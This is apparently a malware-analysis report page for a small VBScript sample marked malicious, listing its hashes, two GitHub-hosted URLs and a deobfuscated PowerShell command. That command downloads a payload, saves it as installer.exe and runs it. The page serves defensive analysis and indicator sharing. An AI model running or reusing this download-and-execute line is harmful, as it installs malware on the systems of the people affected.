Malicious

f5bc414e0201d56967a4380524e6c6ec

Share on LinkedIn Add to favorites

VBScript

MD5: f5bc414e0201d56967a4380524e6c6ec

Size: 790 B

text/vbscript

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	f5bc414e0201d56967a4380524e6c6ec
Sha1	8e6915eecbe7c914625f8448bb8ba9548556307d
Sha256	21d540bd2d78b44c60915f81f42490dad986b557b287a2b81c38ce1f04c1afaf
Sha384	1b86732f1063d353763d9bdab193f5444af8e4f7ada60f07bf107855b3c9ca96399cc6b0d68a8e38dd6b6b6f41c10118
Sha512	c8f0b2a55850add59631b934dcda1ba833aea37c95ea4c008f2838758455fa98f86f2cdd999f61d6e69e9a54f7f80a0e7e7ddadfde1be5fd5ab8bdbadf6476f9
SSDeep	24:ynDmOMGv8l0Q0MGv5f80KhRzp5mH5uTLmOD5uwXecT0VZ/qajWf:ki48xH45sft56vODhiG
TLSH	E0019043F57B5A6FCD5572895120535CE9829FD2250396777A9D4C0C4703D1753874CB

File Structure

Artefacts

Name	Value
URLs in VB Code - #1	https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/XjvdJar2Kf.pif
URLs in VB Code - #2	https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/CSmIub.html
Deobfuscated PowerShell	Invoke-WebRequest -Uri "https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/XjvdJar2Kf.pif" -OutFile "C:\Users\Public\Downloads\installer.exe" Invoke-WebRequest -Uri "https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/CSmIub.html" -OutFile "C:\Users\Public\Downloads\config.data" Start-Process "C:\Users\Public\Downloads\installer.exe" -ArgumentList "C:\Users\Public\Downloads\config.data"

f5bc414e0201d56967a4380524e6c6ec (790 B)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙